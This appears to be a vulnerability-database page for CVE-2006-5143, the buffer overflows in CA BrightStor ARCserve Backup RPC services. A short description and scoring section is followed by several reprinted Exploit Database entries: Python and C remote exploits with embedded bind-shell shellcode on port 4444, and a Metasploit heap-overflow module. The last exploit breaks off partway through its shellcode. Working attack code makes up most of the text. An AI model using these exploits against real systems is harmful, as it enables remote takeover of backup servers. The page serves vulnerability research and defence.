Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Multiple buffer overflows in CA BrightStor ARCserve Backup r11.5 SP1 and earlier, r11.1, and 9.01; BrightStor ARCserve Backup for Windows r11; BrightStor Enterprise Backup 10.5; Server Protection Suite r2; and Business Protection Suite r2 allow remote attackers to execute arbitrary code via crafted data on TCP port 6071 to the Backup Agent RPC Server (DBASVR.exe) using the RPC routines with opcode (1) 0x01, (2) 0x02, or (3) 0x18; invalid stub data on TCP port 6503 to the RPC routines with opcode (4) 0x2b or (5) 0x2d in ASCORE.dll in the Message Engine RPC Server (msgeng.exe); (6) a long hostname on TCP port 41523 to ASBRDCST.DLL in the Discovery Service (casdscsvc.exe); or unspecified vectors related to the (7) Job Engine Service.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 3495
Publication date : 2007-03-15 23h00 +00:00
Author : Winny Thomas
EDB Verified : Yes
#!/usr/bin/python
# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
# tested on windows 2000 SP4 in a VMware environment.
# Opens a shell on TCP port 4444.
#
# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
# provides an interesting case. Unlike a traditional stack overflow where the
# user supplies the overflow data which immediately is copied into a stack
# based buffer, here the user supplied data is stored in the heap and the first
# DWORD of the RPC stub is used as the source address in the strcpy operation.
# This means we have to locate the address of our shellcode on the heap and then
# craft the first DWORD of the stub in such a way that when strcpy is called our
# buffer is the source. I had problems locating the shellcode in the heap,
# because each time I ran the exploit the shellcode would be in different places
# , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very
# large data of around 500000 bytes I saw that along with one of the likely
# locations it was always available at the address 011E0070 aswell. Atleast on
# the setup I have for analysis this address does not have anything useful if
# buffer sizes of 1k, 2k etc are used. Once we get the address straight, there
# after its a straight forward stack overflow that can overwrite EIP.
#
# This exploit binds shell to TCP port 4444 and connects to it
#
# Author shall bear no responsibility for any screw ups caused by using the code
# Winny M Thomas ;-)
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import time
import sys
import os
#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
# The following DWORD gets converted to an address pointing into our
# buffer.
request = struct.pack('<L', 0x00003A7C)
request += "A" * 19608
request += "\x90\x90\xeb\x06"
# At the point of overflow EBX points to our shellcode
# Address of 'call ebx' from kernel32.dll SP4
request += struct.pack('<L', 0x7C577B03)
request += "\x90\x90\x90\x90"
request += shellcode
request += "b" * 480000
dce.call(45, request)
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
DCEconnectAndExploit(target)
print 'Exploit sent to: %s' % target
print 'Connecting to %s:4444' % target
time.sleep(3)
ConnectRemoteShell(target)
# milw0rm.com [2007-03-16]
Exploit Database EDB-ID : 16401
Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: message_engine_heap.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow',
'Description' => %q{
This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup
11.5. By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-5143' ],
[ 'OSVDB', '29533' ],
[ 'BID', '20365' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],
],
'DisclosureDate' => 'Oct 05 2006',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6503)
], self.class)
end
def exploit
connect
handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# straight forward heap stuffz
sploit = make_nops(680) + "\xeb\x0a" + make_nops(2) + [ target.ret ].pack('V')
sploit << [ target['UEF'] ].pack('V') + payload.encoded
print_status("Trying target #{target.name}...")
begin
dcerpc_call(43, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
Exploit Database EDB-ID : 28765
Publication date : 2006-10-04 22h00 +00:00
Author : LSsec.com
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/20365/info
Multiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting these issues allows attackers to execute arbitrary machine code within the context of the affected application.
/*
* LSsec.com
*
* CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define _DCE_RPC_REQ 0x00
#define _DCE_RPC_BIND 0x0B
#define PKT_LEN 2048+24
#define STUB_LEN 2048
unsigned char jmp[]="\xeb\x0a\x90\x90";
unsigned char esi[]="\xbf\x75\x40\x2d";
unsigned char uef[]="\x4c\x14\x54\x7c";
//4444
unsigned char bindshell[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
"\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
"\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
"\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
"\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
"\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
"\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";
typedef struct dceRpc{
unsigned char ver;
unsigned char ver_minor;
unsigned char pkt_type;
unsigned char pkt_flags;
unsigned long data_repres;
unsigned short frag_len;
unsigned short auth_len;
unsigned long caller_id;
} DCE_RPC, *PDCE_RPC;
typedef struct dceRpc2{
unsigned long alloc_hint;
unsigned short con_id;
unsigned short opnum;
} DCE_RPC2, *PDCE_RPC2;
typedef struct dceRpcBind{
unsigned short max_xmit;
unsigned short max_recv;
unsigned long asc_group;
unsigned long num_con_items;
unsigned short con_id;
unsigned short num_trn_items;
} DCE_RPC_BIND, *PDCE_RPC_BIND;
int
lsHex2Raw(unsigned char* s, unsigned char* out)
{
unsigned long i;
unsigned long j=0;
unsigned long len;
unsigned long ret=0;
len=strlen(s);
for(i=0; i<len; i+=2){
if((s[i]>=0x30)&&(s[i]<=0x39))
j=s[i]-0x30;
else
j=s[i]-0x61+10;
j*=16;
if((s[i+1]>=0x30)&&(s[i+1]<=0x39))
j+=s[i+1]-0x30;
else
j+=s[i+1]-0x61+10;
out[ret]=(unsigned char)j;
ret++;
}
return(ret);
}
void
lsInverse(unsigned char* io, unsigned long len)
{
unsigned char c;
unsigned long i;
for(i=0; i<len/2; i++){
c=io[len-i-1];
io[len-i-1]=io[i];
io[i]=c;
}
}
int
lsEncodeUuid(unsigned char* uuid, unsigned char* out)
{
unsigned ar=0;
unsigned cnt=0;
unsigned long i;
unsigned long len;
unsigned long ret;
unsigned char* ptr;
ptr=uuid;
len=strlen(uuid);
for(i=0; i<len; i++){
if(uuid[i]=='-'){
uuid[i]='\0';
if(ar<3){
ret=lsHex2Raw(ptr, out);
lsInverse(out, ret);
out+=ret;
cnt+=ret;
}else{
ret=lsHex2Raw(ptr, out);
out+=ret;
cnt+=ret;
}
ptr=uuid+i+1;
ar++;
}
}
out[len]='\0';
ret=lsHex2Raw(ptr, out);
out+=ret;
cnt+=ret;
return(cnt);
}
unsigned char*
lsDceRpcBind(unsigned long cid, unsigned char* uuid, unsigned short ver, unsigned long* pktLen){
unsigned char* pkt;
unsigned char* tmp;
unsigned char transferSyntax[]="8a885d04-1ceb-11c9-9fe8-08002b104860";
unsigned short ret;
unsigned long cnt;
PDCE_RPC_BIND rpc_bind;
PDCE_RPC rpc;
pkt=(unsigned char*)calloc(2048, 1);
/* 2nd half */
tmp=pkt;
pkt+=sizeof(DCE_RPC);
rpc_bind=(PDCE_RPC_BIND)pkt;
rpc_bind->max_xmit = 0x16D0; //Max Xmit Frag
rpc_bind->max_recv = 0x16D0; //Max Recv Frag
rpc_bind->asc_group = 0; //Assoc Group
rpc_bind->num_con_items = 1; //Num Ctx Items
rpc_bind->con_id = 0; //Context ID
rpc_bind->num_trn_items = 1; //Num Trans Items
pkt+=sizeof(DCE_RPC_BIND);
cnt=lsEncodeUuid(uuid, pkt); //Interface UUID
pkt+=cnt;
memcpy(pkt, &ver, sizeof(short)); //Interface Ver
pkt+=sizeof(short);
*pkt++=0; //Interface Ver Minor
*pkt++=0; //Interface Ver Minor
cnt=lsEncodeUuid(transferSyntax, pkt); //Transfer Syntax
pkt+=cnt;
*pkt++=2; //Transfer Syntax Ver
*pkt++=0; //Transfer Syntax Ver
/* 1st half */
ret=pkt+2-tmp;
rpc=(PDCE_RPC)tmp;
rpc->ver = 5; //Version
rpc->ver_minor = 0; //Version (minor)
rpc->pkt_type = _DCE_RPC_BIND; //Packet Type
rpc->pkt_flags = 3; //Packet Flags
rpc->data_repres = 16; //Data Representation
rpc->frag_len = ret; //Frag Length
rpc->auth_len = 0; //Auth Length
rpc->caller_id = cid; //Call ID
*pktLen=ret;
return(tmp);
}
unsigned char*
lsDceRpcReq(unsigned long cid, unsigned long opnum, unsigned char* uuid, unsigned int encoding, unsigned long flags, unsigned long* pktLen){
unsigned char* pkt;
unsigned char* tmp;
unsigned char stub[STUB_LEN];
unsigned short ret;
unsigned long cnt;
PDCE_RPC rpc;
PDCE_RPC2 rpc2;
pkt=(unsigned char*)calloc(PKT_LEN, 1);
/* 2nd half */
tmp=pkt;
pkt+=sizeof(DCE_RPC);
rpc2=(PDCE_RPC2)pkt;
rpc2->alloc_hint = STUB_LEN; //Stub Data
rpc2->con_id = 0; //Context ID
rpc2->opnum = opnum; //Operation Number
pkt+=sizeof(DCE_RPC2);
if(encoding){
cnt=lsEncodeUuid(uuid, pkt); //Interface UUID
pkt+=cnt;
}
/* stub modification */
memset(stub, 0x90, STUB_LEN);
memcpy(stub+680, jmp, sizeof(jmp)-1);
//call dword ptr ds:[esi+48]
memcpy(stub+684, esi, sizeof(esi)-1);
//UnhandledExceptionFilter
memcpy(stub+688, uef, sizeof(uef)-1);
memcpy(stub+692, bindshell, sizeof(bindshell)-1);
/* ----------------- */
memcpy(pkt, stub, STUB_LEN);
pkt+=STUB_LEN;
/* 1st half */
ret=pkt-tmp;
rpc=(PDCE_RPC)tmp;
rpc->ver = 5; //Version
rpc->ver_minor = 0; //Version (minor)
rpc->pkt_type = _DCE_RPC_REQ; //Packet Type
rpc->pkt_flags = flags; //Packet Flags
rpc->data_repres = 16; //Data Representation
rpc->frag_len = ret; //Frag Length
rpc->auth_len = 0; //Auth Length
rpc->caller_id = cid; //Call ID
*pktLen=ret;
return(tmp);
}
int
lsConnect(unsigned char* host, unsigned short port){
int s;
struct hostent* he;
struct sockaddr_in addr;
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if((he=gethostbyname(host))==NULL){
printf("[-] unable to resolve %s\n", host);
exit(1);
}
if((s=socket(AF_INET, SOCK_STREAM, 0))<0){
printf("[-] socket failed\n");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr*)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
if(connect(s, (struct sockaddr*)&addr, sizeof(struct sockaddr))<0){
printf("[-] connect failed\n");
exit(1);
}
return(s);
}
void
lsSend(int s, unsigned char* pkt, unsigned long cnt){
if(send(s, pkt, cnt, 0)==-1){
printf("[-] send failed\n");
exit(1);
}
}
void
lsRecv(int s){
char recvBuf[4096];
if(recv(s, recvBuf, 4096, 0)<=0){
printf("[-] recv failed\n");
exit(1);
}
}
int
main(int argc, char* argv[]){
int s;
unsigned long cnt;
unsigned char* pkt=NULL;
unsigned char uuidSave[64];
/**********************************************************/
int opnum=43;
unsigned short port= 6503;
unsigned char uuid[]="dc246bf0-7a7a-11ce-9f88-00805fe43838";
/**********************************************************/
if(argc!=2){
printf("\n[-] Usage: %s <ip>\n", argv[0]);
exit(1);
}
printf("\n[+] LSsec.com\n");
printf("\n[+] CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\n");
s=lsConnect(argv[1], port);
memset(uuidSave, '\0', sizeof(uuidSave));
strncpy(uuidSave, uuid, strlen(uuid));
//bind packet
pkt=lsDceRpcBind(1, uuid, 1, &cnt);
lsSend(s, pkt, cnt);
lsRecv(s);
free(pkt);
//request
pkt=lsDceRpcReq(1, opnum, uuidSave, 0, 0x03, &cnt);
lsSend(s, pkt, cnt);
lsRecv(s);
free(pkt);
return(0);
}
Exploit Database EDB-ID : 28766
Publication date : 2006-10-04 22h00 +00:00
Author : LSsec.com
EDB Verified : Yes
source: https://www.securityfocus.com/bid/20365/info
Multiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting these issues allows attackers to execute arbitrary machine code within the context of the affected application.
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit
# (Previously Unknown)
#
# There seems to be an design error in the handling of RPC data with xdr procedures
# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are
# processed as a particular address (xdr_handle_t data which is run through multiple bit
# shifts, and reversing of bytes), and eventually loaded into ECX.
#
# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may
# be Null Credentials and Auth?) leads to an exploitable condition.
#
# .text:0040AACD 008 mov ecx, [esp+8]
# .text:0040AAD1 008 mov dword_418820, esi
# .text:0040AAD7 008 push offset dword_418820
# .text:0040AADC 00C mov eax, [ecx]
# .text:0040AADE 00C call dword ptr [eax+2Ch]
#
# At this point, you have control of ECX (esp+8 is your address data). The data from the packet
# is stored in memory and is relatively static (see NOTE).
#
# The address is then loaded into EAX, and then called as EAX+2Ch, which is
# controllable data from the packet. In this code, I just jump ahead to
# the portbinding shellcode.
#
# NOTE: The only issue I have found is when the system is rebooted, the packet data
# appears at a higher memory location when Mediasvr.exe crashes
# and is restarted. I have accounted for this in the code, when the port that
# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after
# a reboot
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which
# is more then likely the memory locations)
#
# The patches include the following updates to Mediasvr.exe
# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp
#
# CA has been notified
#
# Author: M. Shirk
# Tester: Tebodell
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
import os
import sys
import time
import socket
import struct
#------------------------------------------------------------------------
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
